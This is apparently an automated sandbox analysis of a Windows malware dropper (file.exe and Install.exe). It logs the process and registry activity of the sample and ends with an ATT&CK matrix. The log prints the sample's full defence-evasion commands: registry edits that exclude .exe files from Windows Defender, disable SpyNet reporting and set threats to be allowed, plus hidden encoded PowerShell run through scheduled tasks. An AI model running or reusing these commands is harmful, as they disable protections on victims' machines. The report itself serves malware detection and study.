Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
Source: file.exeBinary or memory string: V{TvMci:
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0041584A SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0041585C SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gahelfxgt" /sc once /st 12:43:49 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gahelfxgt" /sc once /st 12:43:49 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies Group Policy settings
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		11
Scheduled Task/Job		11
Process Injection		2
Masquerading		1
Input Capture		121
Security Software Discovery		Remote Services1
Input Capture		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts21
